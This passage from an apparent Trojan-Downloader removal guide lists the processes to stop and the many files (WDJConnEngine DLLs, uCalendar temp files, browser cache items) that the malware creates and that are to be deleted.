    %original file name%.exe:2040
    riliquicken.exe:408
    6acad04bb03501dc920778ed12ba6d63.tmp:560
    uCalendar.exe:1840

  2. Delete the original Trojan-Downloader file.
  3. Delete or disinfect the following files created/modified by the Trojan-Downloader:

    %Documents and Settings%\%current user%\Local Settings\Temp\is-4FAI5.tmp\6acad04bb03501dc920778ed12ba6d63.tmp (7386 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\adb_dev.dll (129151 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\DriverInstallerX86.exe (23636 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wdj2.tmp (9730 bytes)
    %Documents and Settings%\%current user%\My Documents\xiaomama1.ico (4672 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\wdj_connection.dll (524674 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\DriverInstallerX64.exe (26068 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\version (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Icon_1[1].ico (11345 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\ssleay32.dll (35828 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\libcurl.dll (40972 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\wdjconx86.exe (7772 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\WDJDriverInstaller.exe (7772 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wdj1.tmp (91 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\Config.ini (920 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\wdjconx64.exe (12588 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\libeay32.dll (131173 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EACIG.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BO590.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EUT2I.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-R2SHE.tmp (341 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VUE7K.tmp (854 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CITBH.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-I07M1.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UQKI3.tmp (972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-E3NQ3.tmp (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J9IO1.tmp (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-T5GBV.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-45E9P.tmp (571 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UT2U1.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FSAKH.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H9PQM.tmp (372 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-HBFP8.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MS510.tmp (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-P460L.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FA3VP.tmp (308 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ATVIR.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JMCVI.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\c[1].php (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0DT6F.tmp (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GG746.tmp (799 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6ABIJ.tmp (418 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UB0UL.tmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CA7DT.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H5M3H.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3GBDV.tmp (41 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JC94V.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8P1G7.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-4F4V4.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-S5K1J.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NM4TE.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9K96Q.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-HSHNI.tmp (680 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NC7K8.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-8TDL0.tmp (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-A8EAG.tmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EAR7G.tmp (846 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RDQEM.tmp (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-O8MRK.tmp (399 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-7T15P.tmp (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\小新日历.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B31VB.tmp (676 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8Q63L.tmp (570 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5VQIL.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3GS5K.tmp (211 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9BQPC.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BN1AB.tmp (954 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\botva2.dll (35 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-257BU.tmp (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\CallbackCtrl.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Internet Explorer\MSIMGSIZ.DAT (192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B22SN.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-KKAGK.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-4A2KS.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5UAA5.tmp (29 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-M2S8M.tmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GA32U.tmp (713 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7RVE9.tmp (921 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-K5UU2.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GN5N1.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-1Q822.tmp (395 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CHN29.tmp (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\xttj[1].htm (792 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-AU387.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-9OFM7.tmp (61 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-59Q2H.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RQAU1.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S5QPM.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-F61GP.tmp (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EM3D2.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PAS5F.tmp (528 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JCVVM.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MB7TH.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DPTNS.tmp (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-USMNK.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-84K0R.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FODVB.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UF6NE.tmp (566 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JVH2E.tmp (792 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PEHSU.tmp (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\unins000.dat (77177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SOF93.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BD63S.tmp (46 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RE4AE.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-47L4D.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-TOHRA.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-KPEV6.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-82AQ4.tmp (1 bytes)
    %Documents and Settings%\All Users\Application Data\Icons\ab091a108ba11a214cb2497830748b5a.ico (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OIK1B.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LM96A.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2UJR7.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BFVNJ.tmp (309 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-T7SDK.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DMUUF.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-NQK6G.tmp (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-179PC.tmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VKG5F.tmp (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-64LEO.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8IFBJ.tmp (46 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-19FF6.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0UA5R.tmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CK9D1.tmp (833 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-04CEU.tmp (615 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-KSVR2.tmp (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0IGTG.tmp (873 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-N3NUO.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\WListViewEx.dll (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3ID9I.tmp (398 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SNKL9.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-589D2.tmp (457 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NK9JL.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DIS2A.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SIE6F.tmp (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-VDS88.tmp (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RQ06S.tmp (396 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-15K0J.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-26K4C.tmp (613 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\is-F0AFL.tmp (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ODTLG.tmp (394 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-P4A60.tmp (13 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (4820 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-A0EIM.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RNBC6.tmp (395 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LL8KV.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LN8C3.tmp (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-KLVNJ.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DFOPO.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MKQ0P.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CTVUM.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FLS7N.tmp (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\WSysInfo.dll (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6BKNI.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B6BC5.tmp (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J7PLB.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TKKFL.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-P73ID.tmp (449 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V911M.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-K3A0H.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LFOCI.tmp (891 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S329D.tmp (943 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-ACG6D.tmp (35 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IDDQ0.tmp (531 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-TBR47.tmp (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\info.iam (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DC97P.tmp (857 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RELD2.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TLJE9.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-99O8Q.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VP4MN.tmp (437 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IGNP2.tmp (46 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NM9J5.tmp (949 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6H2UT.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0L13V.tmp (871 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\_isetup\_shfoldr.dll (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-N5L7C.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-A4S61.tmp (474 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2K1SC.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DAG71.tmp (290 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FPQV4.tmp (991 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\ItDownload_wex.dll (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[1].php (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BM7CV.tmp (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-URB1U.tmp (820 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-QDAFG.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DO1SP.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-U18FV.tmp (896 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-U189L.tmp (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FMB0Q.tmp (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DRCF3.tmp (643 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\16246473[1].js (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-4J0MN.tmp (7547 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PCUV5.tmp (523 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\core[1].php (750 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-QJ7LF.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-4P8GP.tmp (986 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6856F.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-AIMV2.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SUTI1.tmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9IE2G.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2AFEU.tmp (298 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OUGF5.tmp (285 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-AIDQ3.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JCB5A.tmp (605 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OR4OD.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CHIVK.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IMBOL.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S9S0K.tmp (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0FVRG.tmp (228 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GJFDH.tmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-71SNV.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SJIC0.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6DTUJ.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-QAKU2.tmp (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9TLEA.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2LCQJ.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-05TI6.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FU923.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-R66KJ.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3H86F.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GLIR6.tmp (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-46B8N.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6G59B.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5FR8P.tmp (913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-TK5N6.tmp (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0VFG1.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BKGKG.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SEBU8.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GPUG4.tmp (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\stat[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2CI1C.tmp (414 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\core[1].php (751 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-L41F1.tmp (17 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ESTCQ.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2GDDK.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9M85H.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-F8PVH.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TFPS7.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-KJA02.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MTLQ9.tmp (686 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\a1[1].htm (100 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-P6CRT.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2J6MD.tmp (317 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5I6TG.tmp (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J8GQQ.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3DN0I.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-316BT.tmp (46 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BH7KA.tmp (1 bytes)
